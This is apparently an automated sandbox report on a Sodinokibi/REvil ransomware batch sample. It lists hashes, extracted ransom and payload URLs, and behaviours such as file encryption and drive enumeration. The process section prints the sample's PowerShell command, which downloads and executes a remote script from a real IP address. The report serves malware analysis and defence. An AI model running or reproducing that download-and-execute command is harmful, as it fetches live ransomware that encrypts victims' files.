Analysis
-
max time kernel
35s -
max time network
43s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-11-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
af1dcc03472a3760e7f068ff48725448.bat
Resource
win7v20201028
Behavioral task
behavioral2
Sample
af1dcc03472a3760e7f068ff48725448.bat
Resource
win10v20201028
General
-
Target
af1dcc03472a3760e7f068ff48725448.bat
-
Size
214B
-
MD5
5cef3f9a231d5cf5d5fbd670d721dccd
-
SHA1
baf5a46fcbe4fae2a70e5d22449ff4ed03a93e33
-
SHA256
f14eb9a5eaf915aa1fb082741ab3c1d275e0dfed65d67b6dabc2cc7b0d01923f
-
SHA512
d51a3c23cd1e5a3b079f76697fd46e4ba37fe3890d8ae29c5106d364d86e2f662fee98483c1c6febaf5087a8c3f4b5b11aff9ff633fd263b939ab416442fda02
Malware Config
Extracted
http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448
Extracted
C:\be6o1iixm-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7FA59E30A8F9FC69
http://decryptor.cc/7FA59E30A8F9FC69
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 2792 powershell.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\RedoSwitch.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConvertFromBlock.tiff => \??\c:\users\admin\pictures\ConvertFromBlock.tiff.be6o1iixm powershell.exe File renamed C:\Users\Admin\Pictures\FormatPing.tiff => \??\c:\users\admin\pictures\FormatPing.tiff.be6o1iixm powershell.exe File renamed C:\Users\Admin\Pictures\MeasureMerge.crw => \??\c:\users\admin\pictures\MeasureMerge.crw.be6o1iixm powershell.exe File renamed C:\Users\Admin\Pictures\RedoSwitch.tiff => \??\c:\users\admin\pictures\RedoSwitch.tiff.be6o1iixm powershell.exe File renamed C:\Users\Admin\Pictures\WaitUninstall.tif => \??\c:\users\admin\pictures\WaitUninstall.tif.be6o1iixm powershell.exe File opened for modification \??\c:\users\admin\pictures\ConvertFromBlock.tiff powershell.exe File opened for modification \??\c:\users\admin\pictures\FormatPing.tiff powershell.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
powershell.exedescription ioc process File opened (read-only) \??\S: powershell.exe File opened (read-only) \??\T: powershell.exe File opened (read-only) \??\V: powershell.exe File opened (read-only) \??\W: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\H: powershell.exe File opened (read-only) \??\P: powershell.exe File opened (read-only) \??\U: powershell.exe File opened (read-only) \??\Z: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\I: powershell.exe File opened (read-only) \??\O: powershell.exe File opened (read-only) \??\R: powershell.exe File opened (read-only) \??\X: powershell.exe File opened (read-only) \??\G: powershell.exe File opened (read-only) \??\J: powershell.exe File opened (read-only) \??\K: powershell.exe File opened (read-only) \??\Q: powershell.exe File opened (read-only) \??\Y: powershell.exe File opened (read-only) \??\D: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\L: powershell.exe File opened (read-only) \??\M: powershell.exe File opened (read-only) \??\N: powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\349.bmp" powershell.exe -
Drops file in Program Files directory 25 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ResetDisconnect.rmi powershell.exe File opened for modification \??\c:\program files\ResetInstall.mht powershell.exe File opened for modification \??\c:\program files\SavePop.mpv2 powershell.exe File opened for modification \??\c:\program files\AddSet.reg powershell.exe File opened for modification \??\c:\program files\CompressStep.pptm powershell.exe File opened for modification \??\c:\program files\EnterRepair.wmv powershell.exe File opened for modification \??\c:\program files\PushCompare.mht powershell.exe File opened for modification \??\c:\program files\ProtectBlock.WTV powershell.exe File opened for modification \??\c:\program files\SkipStep.tif powershell.exe File opened for modification \??\c:\program files\UpdateFormat.html powershell.exe File opened for modification \??\c:\program files\RegisterReceive.m1v powershell.exe File opened for modification \??\c:\program files\RepairConvert.mp2v powershell.exe File opened for modification \??\c:\program files\UnprotectRestore.mid powershell.exe File created \??\c:\program files (x86)\be6o1iixm-readme.txt powershell.exe File opened for modification \??\c:\program files\CompressUnregister.au powershell.exe File opened for modification \??\c:\program files\ConnectUnregister.wmv powershell.exe File opened for modification \??\c:\program files\PingDismount.vsw powershell.exe File opened for modification \??\c:\program files\DenyStop.rtf powershell.exe File opened for modification \??\c:\program files\OutEdit.MTS powershell.exe File opened for modification \??\c:\program files\UpdateUninstall.mp4 powershell.exe File opened for modification \??\c:\program files\WriteGet.svgz powershell.exe File created \??\c:\program files\be6o1iixm-readme.txt powershell.exe File opened for modification \??\c:\program files\ApproveAssert.gif powershell.exe File opened for modification \??\c:\program files\CompleteRename.easmx powershell.exe File opened for modification \??\c:\program files\ConvertToOpen.mht powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeTakeOwnershipPrivilege 2792 powershell.exe Token: SeBackupPrivilege 2088 vssvc.exe Token: SeRestorePrivilege 2088 vssvc.exe Token: SeAuditPrivilege 2088 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 428 wrote to memory of 2792 428 cmd.exe powershell.exe PID 428 wrote to memory of 2792 428 cmd.exe powershell.exe PID 428 wrote to memory of 2792 428 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\af1dcc03472a3760e7f068ff48725448.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448');Invoke-KSBCZTZ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2088
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2792-0-0x0000000000000000-mapping.dmp
-
memory/2792-1-0x00000000731E0000-0x00000000738CE000-memory.dmpFilesize
6.9MB
-
memory/2792-2-0x0000000004C90000-0x0000000004C91000-memory.dmpFilesize
4KB
-
memory/2792-3-0x0000000007860000-0x0000000007861000-memory.dmpFilesize
4KB
-
memory/2792-4-0x0000000007600000-0x0000000007601000-memory.dmpFilesize
4KB
-
memory/2792-5-0x00000000077A0000-0x00000000077A1000-memory.dmpFilesize
4KB
-
memory/2792-6-0x0000000007F70000-0x0000000007F71000-memory.dmpFilesize
4KB
-
memory/2792-7-0x00000000080E0000-0x00000000080E1000-memory.dmpFilesize
4KB
-
memory/2792-8-0x0000000007F40000-0x0000000007F41000-memory.dmpFilesize
4KB
-
memory/2792-9-0x00000000089A0000-0x00000000089A1000-memory.dmpFilesize
4KB
-
memory/2792-10-0x00000000087E0000-0x00000000087E1000-memory.dmpFilesize
4KB
-
memory/2792-11-0x0000000009FA0000-0x0000000009FA1000-memory.dmpFilesize
4KB
-
memory/2792-12-0x0000000009540000-0x0000000009541000-memory.dmpFilesize
4KB